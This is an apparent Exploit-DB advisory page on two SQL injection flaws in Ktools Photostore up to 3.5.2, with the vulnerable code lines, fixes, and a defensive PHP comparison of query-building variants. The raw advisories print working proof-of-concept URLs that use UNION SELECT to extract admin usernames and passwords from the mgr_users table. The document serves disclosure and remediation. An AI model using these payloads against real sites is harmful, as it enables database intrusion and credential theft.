Vendor: Photostore
By: DNX
CVSS: 7.5 (HIGH)
Type: Remote SQL Injection
CWE: 89
Product Name: Photostore
Affected Version From: 3.4.2003
Affected Version To: 3.5.2002
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

Ktools Photostore <= v3.5.2 (crumbs.php) Remote SQL Injection

Ktools Photostore versions up to and including 3.5.2 are vulnerable to remote SQL injection in the crumbs.php file. The exploit only works when PHP's magic quotes are turned off. The vulnerability lets an attacker inject SQL through the 'gid' parameter in the URL, which is interpolated unescaped into a database query, leading to unauthorized access to the database. The issue was discovered by DNX.

Mitigation:

To mitigate this vulnerability, the vendor should replace the insecure line of code with a secure one: use parameterized queries or input validation (such as casting the 'gid' parameter to an integer) to prevent SQL injection. It is recommended to update to a newer version of the software that includes the fix.

Exploit-DB raw data:

                                 \#'#/
                                 (-.-)
   -------------------------oOO---(_)---OOo-------------------------
   | Ktools Photostore <= v3.5.2 (crumbs.php) Remote SQL Injection |
   |              (works only with magic quotes = off)             |
   |                         coded by DNX                          |
   -----------------------------------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.ktools.net
[!] Detected...: 27.04.2008
[!] Reported...: 29.04.2008
[!] Response...: xx.xx.2008

[!] Background.: PhotoStore allows you to setup a complete photo selling 
                 website on your server or hosting space in just minutes.

[!] Price......: $295 Oo.

[!] Bug........: $_GET['gid'] in crumbs.php near line 11

                 05: if($_GET['gid']){
                 
                 08:   function crumbs($gid){
                 09:     global $db, $crumb_array_name, $crumb_array_id;
                 10:     
                 11:     $ca_result = mysql_query("SELECT id,title,nest_under FROM photo_galleries where id = '$gid'", $db);
                 
                 23:   crumbs($_GET['gid']);

                 A direct request on 'crumbs.php' doesn't work, because there is no valid database resource. So we have to look
                 where 'crumbs.php' is included by another script, in 'about_us.php' for example.

[!] Tested on..: v3.4.3, v3.5.2

[!] PoC........: http://127.0.0.1/photostore/about_us.php?gid=0'%20union%20select%201,concat(username,0x2f,password),3%20from%20mgr_users%20/*

[!] Solution...: Replace the insecure codeline with:

                 // cast outside the string: '(int)$gid' inside double quotes is literal text, not a cast
                 $ca_result = mysql_query("SELECT id,title,nest_under FROM photo_galleries where id = " . (int)$gid, $db);



                                        \#'#/
                                        (-.-)
   --------------------------------oOO---(_)---OOo--------------------------------
   | Ktools Photostore <= v3.5.2 (image_details_editor.php) Remote SQL Injection |
   |                                coded by DNX                                 |
   -------------------------------------------------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.ktools.net
[!] Detected...: 26.04.2008
[!] Reported...: 28.04.2008
[!] Response...: 29.04.2008

[!] Background.: PhotoStore allows you to setup a complete photo selling 
                 website on your server or hosting space in just minutes.

[!] Price......: $295 Oo.

[!] Bug........: $_GET['id'] in manager/image_details_editor.php near line 60

                 $image_result = mysql_query("SELECT * FROM uploaded_images where id =" . $_GET['id'], $db);

[!] Tested on..: v2.5, v2.9.8, v3.1.0, v3.1.1, v3.2.0, v3.2.1, v3.4.0, v3.4.2, v3.4.3, v3.5.0, v3.5.1, v3.5.2

[!] PoC........: http://127.0.0.1/photostore/manager/image_details_editor.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,username,11,12,13,password,15,16%20FROM%20mgr_users

[!] Solution...: Replace the insecure codeline with:

                 $image_result = mysql_query("SELECT * FROM uploaded_images where id =" . (int)$_GET['id'], $db);

# milw0rm.com [2008-05-10]
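The two advisories above fix the same class of bug in two different ways. The following PHP is an added example, not Ktools' code: it builds the crumbs.php query text from a constructed 'gid' value under the original line, under a cast written inside the double-quoted string (which PHP does not perform), and under a cast done outside the string as image_details_editor.php's fix does, and adds a prepared-statement version that assumes a mysqli connection to the same schema.

```php
<?php
// Added example, not Ktools' code: how the crumbs.php query text is built from
// $_GET['gid'] under three variants, plus a prepared-statement version.
declare(strict_types=1);

// Constructed sample input: a benign tautology, URL-decoded as PHP would see it.
const SAMPLE_GID = "0' or 1=1 /*";

// Original crumbs.php line 11: $gid is interpolated verbatim into the SQL.
function query_vulnerable(string $gid): string
{
    return "SELECT id,title,nest_under FROM photo_galleries where id = '$gid'";
}

// Cast written inside a double-quoted string: "(int)" is literal text, not a
// cast, so the injected SQL still reaches the database unchanged.
function query_cast_inside_string(string $gid): string
{
    return "SELECT id,title,nest_under FROM photo_galleries where id = '(int)$gid'";
}

// Cast performed outside the string: only an integer can reach the query.
function query_int_cast(string $gid): string
{
    return "SELECT id,title,nest_under FROM photo_galleries where id = " . (int)$gid;
}

// Preferred form: a prepared statement keeps the value out of the SQL text.
// Assumes a mysqli connection to the Photostore schema; not exercised below.
function crumbs_prepared(mysqli $db, string $gid): ?array
{
    $stmt = $db->prepare("SELECT id,title,nest_under FROM photo_galleries WHERE id = ?");
    if ($stmt === false) {
        return null;
    }
    $id = (int)$gid;
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

foreach (['vulnerable' => 'query_vulnerable',
          'cast in string' => 'query_cast_inside_string',
          'int cast' => 'query_int_cast'] as $label => $fn) {
    printf("%-15s %s\n", $label . ':', $fn(SAMPLE_GID));
}
```

Running it shows the first two variants carrying the injected clause verbatim while the third reduces the input to `0`; only the int-cast and prepared-statement forms are safe.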